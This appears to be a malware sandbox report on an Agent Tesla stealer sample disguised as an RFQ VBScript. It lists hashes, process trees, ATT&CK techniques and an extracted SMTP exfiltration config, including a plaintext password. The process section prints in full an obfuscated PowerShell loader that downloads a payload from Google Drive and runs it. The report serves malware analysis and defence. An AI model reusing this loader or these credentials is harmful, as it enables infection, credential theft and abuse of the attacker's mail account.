agenttesla | 06170ef8b08bd8d2e7852f0223a3a5cfcd2e13110424a091e97da539cb5daeab

General

Target

RFQ20240327_Commerical List.vbs
Size

37KB
MD5

3ff689ec2afa2b53b3d5ae76311c9134
SHA1

d97f2bc2c8b06b112853f5a90957b74e5483d75c
SHA256

06170ef8b08bd8d2e7852f0223a3a5cfcd2e13110424a091e97da539cb5daeab
SHA512

c47944327eff299d4f2a35b288016614b538c6920546d311406202b79d22155a82b2d498be78a6a57be3a826583a8e286c45d8a8f562215b8f99f92b62f1ac09
SSDEEP

768:u0NgBv2rWAZGc8NnKwiQmV1RuAP11GtbpZS:+cqNnKwGuUvmbC

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
[email protected]
Password:
Amir@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
[email protected]
Password:
Amir@2021
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
11 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 api.ipify.org
18 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

796 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2576 powershell.exe
796 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2576 set thread context of 796 2576 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

1616 powershell.exe
2576 powershell.exe
2576 powershell.exe
796 wab.exe
796 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2576 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1616 powershell.exe
Token: SeDebugPrivilege 2576 powershell.exe
Token: SeDebugPrivilege 796 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
11	drive.google.com

flow	ioc
17	api.ipify.org
18	api.ipify.org

pid	process
796	wab.exe

pid	process
2576	powershell.exe
796	wab.exe

description	pid	process	target process
PID 2576 set thread context of 796	2576	powershell.exe	wab.exe

pid	process
1616	powershell.exe
2576	powershell.exe
2576	powershell.exe
796	wab.exe
796	wab.exe

pid	process
2576	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	796	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1048 wrote to memory of 1616	1048	WScript.exe	powershell.exe
PID 1048 wrote to memory of 1616	1048	WScript.exe	powershell.exe
PID 1048 wrote to memory of 1616	1048	WScript.exe	powershell.exe
PID 1616 wrote to memory of 2656	1616	powershell.exe	cmd.exe
PID 1616 wrote to memory of 2656	1616	powershell.exe	cmd.exe
PID 1616 wrote to memory of 2656	1616	powershell.exe	cmd.exe
PID 1616 wrote to memory of 2576	1616	powershell.exe	powershell.exe
PID 1616 wrote to memory of 2576	1616	powershell.exe	powershell.exe
PID 1616 wrote to memory of 2576	1616	powershell.exe	powershell.exe
PID 1616 wrote to memory of 2576	1616	powershell.exe	powershell.exe
PID 2576 wrote to memory of 2932	2576	powershell.exe	cmd.exe
PID 2576 wrote to memory of 2932	2576	powershell.exe	cmd.exe
PID 2576 wrote to memory of 2932	2576	powershell.exe	cmd.exe
PID 2576 wrote to memory of 2932	2576	powershell.exe	cmd.exe
PID 2576 wrote to memory of 796	2576	powershell.exe	wab.exe
PID 2576 wrote to memory of 796	2576	powershell.exe	wab.exe
PID 2576 wrote to memory of 796	2576	powershell.exe	wab.exe
PID 2576 wrote to memory of 796	2576	powershell.exe	wab.exe
PID 2576 wrote to memory of 796	2576	powershell.exe	wab.exe
PID 2576 wrote to memory of 796	2576	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240327_Commerical List.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Smilehullet Preorganic brakier Skggeste Prolarva Paafugl #>;$Esther=(cmd /c set /A 115^^0);Function Ingloriously7 ([String]$Vandene){$Trompillo=[char][int]$Esther+'ubstring';$Borteskamoterende=8;$Glorifikationernes=Forttte12($Vandene);For($Flovende=7; $Flovende -lt $Glorifikationernes; $Flovende+=$Borteskamoterende){$Mrkekamres=$Vandene.$Trompillo.Invoke($Flovende, 1);$Supposal=$Supposal+$Mrkekamres;}$Supposal;}function Ventesalen ($Leasable){. ($Hulebeboeren33) ($Leasable);}function Forttte12 ([String]$Rubricality){$Tepefied=$Rubricality.Length-1;$Tepefied;}$Nasalised=Ingloriously7 'Gyneci.TDulcianr ontumeatem eranBr.epsysBahamiafTibe breRecit.rrPtolemerMalacatiNondangn bestemg,npriza ';$Vaek=Ingloriously7 'Alantu,hFodermetInbreedtKrilr npSapiencs Lang,u:commona/ Yde,vg/.enneskdHae.ogrrDiscoveiBirchmavKluddere Maalka.Oest.uagHy eremoPreverioClo preg GennemlBe,nninepcton g.HenryktcLithogroGulyshrmFondsbr/Re,roseu fusio,cRestful? Reg,ese NitramxBas oonpAffdninoPresse rPuckfoitBipyrid=SmalhandD ttessoNationawOpv,sninIdvandelSubadmio MonotoaBon,emad Coloni&EmblazoiDecousudriatacl=rhizina1 Sandl 7Lderbry_TaenidiXUnrepreEAdmitte9BydrengERundpi,-Flodildi Jewryc0VariatiiReno,at8UnderafRUn.ergiY AecidiVS.garsdNPe tingvShertheo hyrdenJRvesaksjMakulatk recleaG A,quis5 FatherR Mae.ad-RevolutpSkovserkPla.chegGastronxP.efileABa.okbyZRevo,utrBelizer_Ea,ings ';$Hulebeboeren33=Ingloriously7 ' Fremt,i hydrare Malko.xy.wynep ';$Koalitionspartnernes218=Ingloriously7 ',enanth$Sver.gegAnatomolLan sbyoEndelsebPilsnera Sbe.rtl,aarets:Ove,broAOfthi,kaDisp,umrUnfathograahv,da Orientmdy,ecellNormot.efstegaasSy logi Duvetin= Mocsol PetershSResinbut Bek.mbaunsuscerMilitantSpartli-,scalopB,dstraai SoejletTermogrsEosop,oTSkrubsarL.mpineaSirmuelnNormernsEuph oef .ristoeSkrid er Gengan Uniform-FlkhammSSeasoneoskattebuSermoner ArthrocrepremieWheelag Telesiu$ImpertuVAeterenaRetrieveFlaviahkCladodo Radioda-geminatDStenchieHexamersFis eplt FilspaiSlambadnP,etrocaBaalzebtTrinit iHydrodyoDiagnosnCupro,s Valutac$ScenevaTHan.elseRepa,atrBums.tfeGarrot,b BlecidaThoughttT,ermiteEpoxym. ';Ventesalen (Ingloriously7 'Crow.ma$Lingto.gPharmaclDiskantoSodomi bAa ringaPeesa hlBygning:DoxorubT .ttribe SubirrrGyro ore ,abrikbdict.toa BrigadtKondolee Nyfald=Multipr$Tapetdre StorkenSpildevv.endine:Atomteoa PetrokpamniotepOppressdBltespnaAdventit DsetsaaAgerkaa ') ;Ventesalen (Ingloriously7 ' A pergIPernillm,ynchrop agaceroOrangewrUdkantstAnlgsfo-AfklariMTruncusoIndgravd H postuEnterpilK,mmanded mensi ProcentBBargeb ibehr.gbt Sagnoms ArchikT EmbargrUnslatiaIns.minnDromoitsSmudsomfMeg bareStrgkunrsillago ') ;$Terebate=$Terebate+'\Forklifts.Rin' ;Ventesalen (Ingloriously7 'Aede ga$ Ps udog DespislRoadtraoSpillefb Srverla Allittl Clouee:bevbnerSChiselaeHalfpenlPeleghaeAdressen TroposiUnphrend Abeliae .ocktarInkassoaHulbaan=Normali(HeroiniT G undfe PhyllosInd,ivntD ffeds-OverlbeP BonitsaTurstritBulbulbhNemoric ecstati$ BulkieTPensummeShavegrrKa,italeFry setbForseg,aReawaketRaadslaeAdulte,) evigli ') ;while (-not $Selenidera) {Ventesalen (Ingloriously7 'acquisiI UdsgtffSilence Lapa er(modstt $CoorsskAGnaske,a Irritar OvermogtonicocaWiten,gmVledesilFerrotyeRytterisForepro.TransfoJGambl,noUnacquibProustiSTilfgnetRazi,goa HaandetSkoserteSericin mimiam-alwine,eAgonistqFant,dd billedv$MarginvNGinglesa DrabsesUnbast aComputel venn.siAnamnessReconcie Vks bedVkstfas)Lastepa publiku{Nankin SBas onetTyrrgryaOvers,urElektritArchere-Cranki.SP,aemislVandrete Skn,edeParate.pTronhim Masknin1 Pa.frt}RedediceFremhvnlBygkornsA naliseEr.ring{.uphorbSSonambutInterj,aBarrierrUnderlitShewasn-Medde,eSAabninglI.spekte FungifeBorgerlpLotuk.p Antikvi1Christo; Autog.VRud,leseRevivornSolbrretMo.tenseP rafrasTrimnina G irsplTownshieSynsindn Bonbo Efterve$ MosekoKStareneoDensitea Bla.lulPennalhiToxemiatFl.rieriGudeligoS,inettn SprinksAgterhapAfskedsaBlidernrBleskivt LedastnHesioneeelectrorGrundlon UncompeMrtelvrsUncomme2Ganodon1Pseudos8communi}ecbolic ');Ventesalen (Ingloriously7 'Seminar$Enke,tdgSpirit lDervekooForstrkbAbirrita MarkrklStrmpes:PanderlSSka,lere Speltzl europheRos,lilnForsknii.eformpdChrist,eimpossirDatadivaJamesin=Komplic(valsevrT Ben ibeStandarsPhallictB.nedic-SinusfuP TndstiaSarandotBegyndehMidport ,dlgsfo$BryggedTMingli eUforfalrGruppeseDaabunobOviculaaSaddelktPungroteunmanif) Aalbor ') ;}Ventesalen (Ingloriously7 'Unpayin$ SkuretgAl.ersslS.cialpoRestlesbOpslag aAnasarclHorsebr: Kn.benPStuega rInterdeo mu,escdLivmodeuBlodprvc .mlacre Cubi orWergeldeCy,selitTogbetj Turne,e=Epiplas Brie,neGRive.ileHjemmegt Unrefr- MahaafCNe.tralo FartgrnBillboatTeoretieZoophilnBnkbogctPantefo Desinfo$SallownTSvuppeneMa,iporr,olenoceBemournbIndsbrea SolekltPoloniueRe rmar ');Ventesalen (Ingloriously7 'Oprrshr$Hyls reg Chillulud.ringo IsattebPres,pea ProctolSkibsvr:ForskniF GentialCrucianoAger.okoBuffontkTicklesa Gg stonPre efi Abekat = Efters Poplyde[Re ieveSInstru.y InfarcsPlat.ertTvebople BetastmBeskrin.WeighbrCfillovioLinjetlnTrustedvPoli.ike stvsugrMiljtiltEndosse]Nasaump:Grassch:forhaanFT,ansfor Blin,eoLemmieemOttreliBForngteaKammerjsTranspoeOversat6Tllenr,4LimstenS Prote,tTekstferDecompeiRepartinIhla.tigPres,yt(Reposse$ KeraunPSta,mefr Fo.pago ollektdtilstrbuU mediac.ommandeStempe,r.veranie,errorbtBetonie)Branche ');Ventesalen (Ingloriously7 ' myster$ VelforgKlbri vlSnirkleoAldeh dbTrlleara FrogfllAvertis: UddataGPha.acir Trafike.ynderny tor sub.latworeTil.ageaGagmandr DokumedFastuou Udmund =Thu der Figentr[SektionSPhosphiy Saddles Leger tGamophae SubsynmNegerss.UndersgTCrebriseniffcanxElektrotB.itzkr.Pl.riliE,orudben,estterc Ekstrao PredardDeplumaiEfterbenT.uchergEksamin] Asnssu: Ln,lid:MartyriAnotifieSKylli,gCeq.alizI BearskIHukecac.JugoslaG Svinghe LakkettDicyemiS Klinikt Sparsmrdermoidi Histoln Smaabrgs,henes(Sankend$AdhakabF SemipelDryssfooSkovseroSessresk.ibachiaAntecelnTreto,m)Graaspu ');Ventesalen (Ingloriously7 'Frokost$Jernp rgSkatteelstky teoStempelb Ma,ghaaMegal,clAccente:BeredniVChatteliPariaerk,mbolteiLnklasse,uppedssIllumin=grundv $J,rrymaGNotecasr.alleineAkkumulySnirklebByggemoeSejlfriaund,rdrrZombiend Extras. GennemsEuphuizuMisc,nobMacc.iasKasida.tInt.acorEmissioi SqueggnMenuk rg Kforwa(Kafeens3.artens6 Antine3 Gte ag5 Unlink4O.erwis1Bruseh.,Skle,os3Tandtek1repercu9Profess3Archsno4Assauge)Laryngo ');Ventesalen $Vikies;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2656

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Smilehullet Preorganic brakier Skggeste Prolarva Paafugl #>;$Esther=(cmd /c set /A 115^^0);Function Ingloriously7 ([String]$Vandene){$Trompillo=[char][int]$Esther+'ubstring';$Borteskamoterende=8;$Glorifikationernes=Forttte12($Vandene);For($Flovende=7; $Flovende -lt $Glorifikationernes; $Flovende+=$Borteskamoterende){$Mrkekamres=$Vandene.$Trompillo.Invoke($Flovende, 1);$Supposal=$Supposal+$Mrkekamres;}$Supposal;}function Ventesalen ($Leasable){. ($Hulebeboeren33) ($Leasable);}function Forttte12 ([String]$Rubricality){$Tepefied=$Rubricality.Length-1;$Tepefied;}$Nasalised=Ingloriously7 'Gyneci.TDulcianr ontumeatem eranBr.epsysBahamiafTibe breRecit.rrPtolemerMalacatiNondangn bestemg,npriza ';$Vaek=Ingloriously7 'Alantu,hFodermetInbreedtKrilr npSapiencs Lang,u:commona/ Yde,vg/.enneskdHae.ogrrDiscoveiBirchmavKluddere Maalka.Oest.uagHy eremoPreverioClo preg GennemlBe,nninepcton g.HenryktcLithogroGulyshrmFondsbr/Re,roseu fusio,cRestful? Reg,ese NitramxBas oonpAffdninoPresse rPuckfoitBipyrid=SmalhandD ttessoNationawOpv,sninIdvandelSubadmio MonotoaBon,emad Coloni&EmblazoiDecousudriatacl=rhizina1 Sandl 7Lderbry_TaenidiXUnrepreEAdmitte9BydrengERundpi,-Flodildi Jewryc0VariatiiReno,at8UnderafRUn.ergiY AecidiVS.garsdNPe tingvShertheo hyrdenJRvesaksjMakulatk recleaG A,quis5 FatherR Mae.ad-RevolutpSkovserkPla.chegGastronxP.efileABa.okbyZRevo,utrBelizer_Ea,ings ';$Hulebeboeren33=Ingloriously7 ' Fremt,i hydrare Malko.xy.wynep ';$Koalitionspartnernes218=Ingloriously7 ',enanth$Sver.gegAnatomolLan sbyoEndelsebPilsnera Sbe.rtl,aarets:Ove,broAOfthi,kaDisp,umrUnfathograahv,da Orientmdy,ecellNormot.efstegaasSy logi Duvetin= Mocsol PetershSResinbut Bek.mbaunsuscerMilitantSpartli-,scalopB,dstraai SoejletTermogrsEosop,oTSkrubsarL.mpineaSirmuelnNormernsEuph oef .ristoeSkrid er Gengan Uniform-FlkhammSSeasoneoskattebuSermoner ArthrocrepremieWheelag Telesiu$ImpertuVAeterenaRetrieveFlaviahkCladodo Radioda-geminatDStenchieHexamersFis eplt FilspaiSlambadnP,etrocaBaalzebtTrinit iHydrodyoDiagnosnCupro,s Valutac$ScenevaTHan.elseRepa,atrBums.tfeGarrot,b BlecidaThoughttT,ermiteEpoxym. ';Ventesalen (Ingloriously7 'Crow.ma$Lingto.gPharmaclDiskantoSodomi bAa ringaPeesa hlBygning:DoxorubT .ttribe SubirrrGyro ore ,abrikbdict.toa BrigadtKondolee Nyfald=Multipr$Tapetdre StorkenSpildevv.endine:Atomteoa PetrokpamniotepOppressdBltespnaAdventit DsetsaaAgerkaa ') ;Ventesalen (Ingloriously7 ' A pergIPernillm,ynchrop agaceroOrangewrUdkantstAnlgsfo-AfklariMTruncusoIndgravd H postuEnterpilK,mmanded mensi ProcentBBargeb ibehr.gbt Sagnoms ArchikT EmbargrUnslatiaIns.minnDromoitsSmudsomfMeg bareStrgkunrsillago ') ;$Terebate=$Terebate+'\Forklifts.Rin' ;Ventesalen (Ingloriously7 'Aede ga$ Ps udog DespislRoadtraoSpillefb Srverla Allittl Clouee:bevbnerSChiselaeHalfpenlPeleghaeAdressen TroposiUnphrend Abeliae .ocktarInkassoaHulbaan=Normali(HeroiniT G undfe PhyllosInd,ivntD ffeds-OverlbeP BonitsaTurstritBulbulbhNemoric ecstati$ BulkieTPensummeShavegrrKa,italeFry setbForseg,aReawaketRaadslaeAdulte,) evigli ') ;while (-not $Selenidera) {Ventesalen (Ingloriously7 'acquisiI UdsgtffSilence Lapa er(modstt $CoorsskAGnaske,a Irritar OvermogtonicocaWiten,gmVledesilFerrotyeRytterisForepro.TransfoJGambl,noUnacquibProustiSTilfgnetRazi,goa HaandetSkoserteSericin mimiam-alwine,eAgonistqFant,dd billedv$MarginvNGinglesa DrabsesUnbast aComputel venn.siAnamnessReconcie Vks bedVkstfas)Lastepa publiku{Nankin SBas onetTyrrgryaOvers,urElektritArchere-Cranki.SP,aemislVandrete Skn,edeParate.pTronhim Masknin1 Pa.frt}RedediceFremhvnlBygkornsA naliseEr.ring{.uphorbSSonambutInterj,aBarrierrUnderlitShewasn-Medde,eSAabninglI.spekte FungifeBorgerlpLotuk.p Antikvi1Christo; Autog.VRud,leseRevivornSolbrretMo.tenseP rafrasTrimnina G irsplTownshieSynsindn Bonbo Efterve$ MosekoKStareneoDensitea Bla.lulPennalhiToxemiatFl.rieriGudeligoS,inettn SprinksAgterhapAfskedsaBlidernrBleskivt LedastnHesioneeelectrorGrundlon UncompeMrtelvrsUncomme2Ganodon1Pseudos8communi}ecbolic ');Ventesalen (Ingloriously7 'Seminar$Enke,tdgSpirit lDervekooForstrkbAbirrita MarkrklStrmpes:PanderlSSka,lere Speltzl europheRos,lilnForsknii.eformpdChrist,eimpossirDatadivaJamesin=Komplic(valsevrT Ben ibeStandarsPhallictB.nedic-SinusfuP TndstiaSarandotBegyndehMidport ,dlgsfo$BryggedTMingli eUforfalrGruppeseDaabunobOviculaaSaddelktPungroteunmanif) Aalbor ') ;}Ventesalen (Ingloriously7 'Unpayin$ SkuretgAl.ersslS.cialpoRestlesbOpslag aAnasarclHorsebr: Kn.benPStuega rInterdeo mu,escdLivmodeuBlodprvc .mlacre Cubi orWergeldeCy,selitTogbetj Turne,e=Epiplas Brie,neGRive.ileHjemmegt Unrefr- MahaafCNe.tralo FartgrnBillboatTeoretieZoophilnBnkbogctPantefo Desinfo$SallownTSvuppeneMa,iporr,olenoceBemournbIndsbrea SolekltPoloniueRe rmar ');Ventesalen (Ingloriously7 'Oprrshr$Hyls reg Chillulud.ringo IsattebPres,pea ProctolSkibsvr:ForskniF GentialCrucianoAger.okoBuffontkTicklesa Gg stonPre efi Abekat = Efters Poplyde[Re ieveSInstru.y InfarcsPlat.ertTvebople BetastmBeskrin.WeighbrCfillovioLinjetlnTrustedvPoli.ike stvsugrMiljtiltEndosse]Nasaump:Grassch:forhaanFT,ansfor Blin,eoLemmieemOttreliBForngteaKammerjsTranspoeOversat6Tllenr,4LimstenS Prote,tTekstferDecompeiRepartinIhla.tigPres,yt(Reposse$ KeraunPSta,mefr Fo.pago ollektdtilstrbuU mediac.ommandeStempe,r.veranie,errorbtBetonie)Branche ');Ventesalen (Ingloriously7 ' myster$ VelforgKlbri vlSnirkleoAldeh dbTrlleara FrogfllAvertis: UddataGPha.acir Trafike.ynderny tor sub.latworeTil.ageaGagmandr DokumedFastuou Udmund =Thu der Figentr[SektionSPhosphiy Saddles Leger tGamophae SubsynmNegerss.UndersgTCrebriseniffcanxElektrotB.itzkr.Pl.riliE,orudben,estterc Ekstrao PredardDeplumaiEfterbenT.uchergEksamin] Asnssu: Ln,lid:MartyriAnotifieSKylli,gCeq.alizI BearskIHukecac.JugoslaG Svinghe LakkettDicyemiS Klinikt Sparsmrdermoidi Histoln Smaabrgs,henes(Sankend$AdhakabF SemipelDryssfooSkovseroSessresk.ibachiaAntecelnTreto,m)Graaspu ');Ventesalen (Ingloriously7 'Frokost$Jernp rgSkatteelstky teoStempelb Ma,ghaaMegal,clAccente:BeredniVChatteliPariaerk,mbolteiLnklasse,uppedssIllumin=grundv $J,rrymaGNotecasr.alleineAkkumulySnirklebByggemoeSejlfriaund,rdrrZombiend Extras. GennemsEuphuizuMisc,nobMacc.iasKasida.tInt.acorEmissioi SqueggnMenuk rg Kforwa(Kafeens3.artens6 Antine3 Gte ag5 Unlink4O.erwis1Bruseh.,Skle,os3Tandtek1repercu9Profess3Archsno4Assauge)Laryngo ');Ventesalen $Vikies;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2932

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
37a0083de2f6915b91f8d199d92b70c8

SHA1
3ec58df2ebeefc61020f3887b46d3da248459ed1

SHA256
a4db87183b4e318a0519097617da5758fb53fd4281a982a08a3e9c6bd45b15b0

SHA512
4de11dc46d5f43ff02046cd87f04fd41daea6b205c41f4787247b08f3b9f0b71b99458900fc7699ced1c4b6b4faf3968479ad3488d07df089a4e11256d93b934

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5EC3.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4BNWTWN6RGGQ3QHBUD0M.temp
Filesize
7KB

MD5
3bdf8b36b58dee2ac3552dfbbc03e4f3

SHA1
e481196da25192f1754c560964ca84abc81cd4d6

SHA256
05ee86bb69edba4c5131e77396c0547d91f775178663c040b184c57611baa3b3

SHA512
1116f13c419e2699fc670845601ebcf91b3eda7a05a61f30f4e93df04c71d2487ba396d706136fd11dbd02ce483a0f45c070106d4944ff22ef850e068607ee4f

Download Submit
memory/796-73-0x0000000077A40000-0x0000000077B16000-memory.dmp

Filesize
856KB

Download
memory/796-49-0x0000000077A40000-0x0000000077B16000-memory.dmp

Filesize
856KB

Download
memory/796-72-0x0000000000FE0000-0x0000000002042000-memory.dmp

Filesize
16.4MB

Download
memory/796-82-0x000000006F290000-0x000000006F97E000-memory.dmp

Filesize
6.9MB

Download
memory/796-47-0x0000000077850000-0x00000000779F9000-memory.dmp

Filesize
1.7MB

Download
memory/796-77-0x000000006F290000-0x000000006F97E000-memory.dmp

Filesize
6.9MB

Download
memory/796-76-0x0000000000FE0000-0x0000000001022000-memory.dmp

Filesize
264KB

Download
memory/796-48-0x0000000077A76000-0x0000000077A77000-memory.dmp

Filesize
4KB

Download
memory/796-78-0x0000000025000000-0x0000000025040000-memory.dmp

Filesize
256KB

Download
memory/796-83-0x0000000025000000-0x0000000025040000-memory.dmp

Filesize
256KB

Download
memory/1616-11-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-13-0x0000000002870000-0x0000000002882000-memory.dmp

Filesize
72KB

Download
memory/1616-4-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/1616-21-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-22-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-23-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-24-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-19-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1616-12-0x0000000002960000-0x0000000002982000-memory.dmp

Filesize
136KB

Download
memory/1616-75-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1616-9-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-10-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1616-5-0x00000000022F0000-0x00000000022F8000-memory.dmp

Filesize
32KB

Download
memory/1616-7-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/1616-6-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2576-16-0x0000000073890000-0x0000000073E3B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-46-0x0000000077A40000-0x0000000077B16000-memory.dmp

Filesize
856KB

Download
memory/2576-45-0x0000000077850000-0x00000000779F9000-memory.dmp

Filesize
1.7MB

Download
memory/2576-44-0x0000000005FC0000-0x00000000060C0000-memory.dmp

Filesize
1024KB

Download
memory/2576-42-0x0000000002340000-0x0000000002380000-memory.dmp

Filesize
256KB

Download
memory/2576-41-0x00000000065E0000-0x000000000B984000-memory.dmp

Filesize
83.6MB

Download
memory/2576-40-0x0000000005C20000-0x0000000005C21000-memory.dmp

Filesize
4KB

Download
memory/2576-39-0x0000000002340000-0x0000000002380000-memory.dmp

Filesize
256KB

Download
memory/2576-38-0x0000000073890000-0x0000000073E3B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-74-0x0000000073890000-0x0000000073E3B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-37-0x0000000073890000-0x0000000073E3B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-35-0x0000000005FC0000-0x00000000060C0000-memory.dmp

Filesize
1024KB

Download
memory/2576-34-0x0000000002340000-0x0000000002380000-memory.dmp

Filesize
256KB

Download
memory/2576-20-0x0000000002340000-0x0000000002380000-memory.dmp

Filesize
256KB

Download
memory/2576-18-0x0000000002340000-0x0000000002380000-memory.dmp

Filesize
256KB

Download
memory/2576-17-0x0000000073890000-0x0000000073E3B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads